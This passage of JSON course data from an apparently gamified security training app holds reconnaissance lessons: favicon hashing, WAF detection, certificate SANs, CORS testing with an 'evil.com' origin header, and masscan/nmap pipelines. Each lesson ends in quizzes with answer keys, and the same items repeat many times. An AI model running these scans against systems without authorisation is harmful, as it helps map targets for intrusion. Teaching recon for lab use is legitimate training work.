fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1}]},{"id":"r2-favicon-tech","cat":"Reconnaissance","title":"Favicon Technology ID","diff":1,"xp":75,"intro":"Identify technology by favicon hash.","sections":[{"type":"text","content":"Each framework has a unique favicon hash searchable on Shodan."},{"type":"code","lang":"bash","content":"python3 -c \"import mmh3,requests,codecs;r=requests.get('https://target.com/favicon.ico');print(mmh3.hash(codecs.lookup('base64').encode(r.content)[0]))\""},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Favicon hashing identifies...","opts":["Users","The technology/framework behind a website","Passwords","Network topology"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2}]},{"id":"r2-waf-detect","cat":"Reconnaissance","title":"WAF Detection","diff":1,"xp":75,"intro":"Identify if and which WAF protects the target.","sections":[{"type":"text","content":"wafw00f and nmap scripts detect WAF presence and type."},{"type":"code","lang":"bash","content":"wafw00f https://target.com\nnmap -p 443 --script http-waf-detect target.com"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Knowing the WAF helps because...","opts":["It's not useful","You can craft bypass payloads specific to that WAF","It blocks everything","WAFs are unbypassable"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1}]},{"id":"r2-ssl-cert-alt","cat":"Reconnaissance","title":"Certificate Alternative Names","diff":2,"xp":150,"intro":"SANs in SSL certs reveal additional domains.","sections":[{"type":"text","content":"One certificate may cover dozens of subdomains via SANs."},{"type":"code","lang":"bash","content":"echo | openssl s_client -connect target.com:443 2>/dev/null | openssl x509 -noout -ext subjectAltName"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"SANs reveal...","opts":["Encryption strength","Additional domains on the same certificate","Private keys","Passwords"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1}]},{"id":"r2-wayback-diff","cat":"Reconnaissance","title":"Wayback Machine Diff Analysis","diff":3,"xp":200,"intro":"Compare historical versions to find removed sensitive content.","sections":[{"type":"text","content":"Diff old and current pages to find removed debug info, endpoints, and credentials."},{"type":"code","lang":"bash","content":"waybackurls target.com | sort -u > old_urls.txt\n# Compare with current sitemap\n# Removed URLs may still be accessible\ncurl -s 'old_removed_endpoint'"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Removed content may be...","opts":["Gone forever","Still accessible even though removed from navigation","Encrypted","Compressed"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1}]},{"id":"r2-cors-check","cat":"Reconnaissance","title":"CORS Misconfiguration Testing","diff":2,"xp":150,"intro":"Check CORS headers for overly permissive origins.","sections":[{"type":"text","content":"Test if the server reflects arbitrary Origin headers with credentials."},{"type":"code","lang":"bash","content":"curl -H 'Origin: https://evil.com' -I https://target.com/api\n# Check: Access-Control-Allow-Origin: https://evil.com\n# AND: Access-Control-Allow-Credentials: true"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Dangerous CORS reflects...","opts":["No origin","Any origin with credentials allowed","Only trusted origins","The referer"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1}]},{"id":"r2-open-ports-context","cat":"Reconnaissance","title":"Understanding Open Port Context","diff":1,"xp":50,"intro":"Open ports are meaningless without understanding what they mean.","sections":[{"type":"text","content":"Port 22 = SSH (shell access), 80/443 = web, 3306 = MySQL, 6379 = Redis. Each has different attack vectors."},{"type":"code","lang":"bash","content":"# Common ports and their meaning:\n# 21:FTP 22:SSH 25:SMTP 53:DNS 80:HTTP 110:POP3\n# 139/445:SMB 443:HTTPS 1433:MSSQL 3306:MySQL\n# 3389:RDP 5432:PostgreSQL 6379:Redis 8080:HTTP-alt"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Port 6379 typically runs...","opts":["SSH","Redis","MySQL","Apache"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1},{"type":"quiz","q":"nmap timing -T4 is...","opts":["Slowest","Paranoid","Aggressive fast","Insane"],"ans":2},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1}]},{"id":"r2-network-enum-adv","cat":"Reconnaissance","title":"Advanced Network Enumeration","diff":4,"xp":250,"intro":"Combine multiple tools for comprehensive network mapping.","sections":[{"type":"text","content":"Masscan for speed, nmap for detail, Nessus for vulns, EyeWitness for screenshots."},{"type":"code","lang":"bash","content":"# Pipeline:\nmasscan -p1-65535 target --rate=10000 -oL ports.txt\nnmap -sV -sC -p$(cat ports.txt | awk '{print $3}' | sort -u | tr '\\n' ',') target\nnuclei -l live_hosts.txt"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"Advanced enum combines...","opts":["One tool","Multiple tools for speed, detail, and vulnerability detection","Only nmap","Only masscan"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1}]},{"id":"r-spf-dkim-recon","cat":"Reconnaissance","title":"SPF/DKIM/DMARC Recon","diff":2,"xp":150,"intro":"Email authentication records reveal mail infrastructure.","sections":[{"type":"text","content":"SPF lists authorized senders, DKIM shows signing domains, DMARC reveals enforcement policy. Missing or weak records = spoofable."},{"type":"code","lang":"bash","content":"dig txt target.com | grep spf\ndig txt _dmarc.target.com\ndig txt selector._domainkey.target.com"},{"type":"text","content":"Understanding recon data is as important as finding it. Every open port is a door, every leaked credential is a key. Think: what does this let me do next?"},{"type":"tip","content":"Document findings as you go: domains, IPs, emails, technologies, potential entry points. Good notes save hours."},{"type":"task","content":"Run a full recon workflow on a lab target: WHOIS, DNS, cert transparency, web archives. Document everything before any active scanning."},{"type":"quiz","q":"DMARC p=none means...","opts":["Reject spoofed mail","Do nothing (monitor only)","Quarantine","Block all mail"],"ans":1},{"type":"quiz","q":"What does nmap -sV do?","opts":["OS detection","Service version detection","Vulnerability scan","Stealth scan"],"ans":1},{"type":"quiz","q":"Passive recon means...","opts":["Scanning ports","Gathering info without touching the target","Running exploits","Social engineering"],"ans":1},{"type":"quiz","q":"Which DNS record type points to a mail server?","opts":["A","CNAME","MX","TXT"],"ans":2},{"type":"quiz","q":"Shodan indexes...","opts":["Web pages","Internet-connected devices and services","Social media","Dark web"],"ans":1},{"type":"quiz","q":"Banner grabbing reveals...","opts":["Passwords","Service software and version","Network topology","Firewall rules"],"ans":1},{"type":"quiz","q":"nmap -O detects...","opts":["Open ports","Operating system","Output format","Obfuscation"],"ans":1},{"type":"quiz","q":"What is Google dorking?","opts":["Attacking Google","Using search operators to find exposed info","DDoS","DNS enum"],"ans":1},{"type":"quiz","q":"A /24 subnet has how many usable IPs?","opts":["24","256","254","128"],"ans":2},{"type":"quiz","q":"Which port is SSH?","opts":["21","22","23","25"],"ans":1},{"type":"quiz","q":"nmap -p- scans...","opts":["Top 1000 ports","All 65535 ports","Only UDP","Only port 80"],"ans":1},{"type":"quiz","q":"SPF records use which DNS type?","opts":["A","MX","TXT","CNAME"],"ans":2},{"type":"quiz","q":"What does dig +short return?","opts":["Full response","Just the answer value","Zone transfer","Server info"],"ans":1},{"type":"quiz","q":"Port 3389 is...","opts":["SSH","HTTP","RDP","DNS"],"ans":2},{"type":"quiz","q":"Censys indexes...","opts":["Social media","Internet-wide scan data and certificates","Dark web","Emails"],"ans":1},{"type":"quiz","q":"nmap -sC runs...","opts":["SYN scan","Default scripts","Connectivity check","Version detection"],"ans":1},{"type":"quiz","q":"Recon-ng is a...","opts":["Vulnerability scanner","Reconnaissance framework","Password cracker","Firewall"],"ans":1},{"type":"quiz","q":"traceroute reveals...","opts":["Open ports","Network path to the target","Vulnerabilities","User accounts"],"ans":1},{"type":"quiz","q":"WHOIS provides...","opts":["Website content","Domain registration info","Vulnerabilities","Speed"],"ans":1},{"type":"quiz","q":"Subdomain enumeration finds...","opts":["Passwords","Hidden services and attack surface","Firewall rules","Accounts"],"ans":1},{"type":"quiz","q":"OSINT stands for...","opts":["Open Source Intelligence","Operating System Integration","Online Security Interface","Offensive Strike"],"ans":0},{"type":"quiz","q":"What tool discovers subdomains?","opts":["Metasploit","Amass","Wireshark","Hashcat"],"ans":1},{"type":"quiz","q":"Certificate transparency logs help find...","opts":["Private keys","Subdomains via issued certificates","Malware","Credentials"],"ans":1},{"type":"quiz","q":"Email format discovery helps...","opts":["Find passwords","Predict employee email addresses","Find servers","List vulns"],"ans":1},{"type":"quiz","q":"theHarvester collects...","opts":["Malware","Emails and names from public sources","Exploit code","Packets"],"ans":1}]},{"id":"r-cloud-function-enum","cat":"Reconnaissance","title":"Serverless Function Enumeration","diff":4,"xp":250,"intro":"Discover exposed Lambda/Cloud Functions 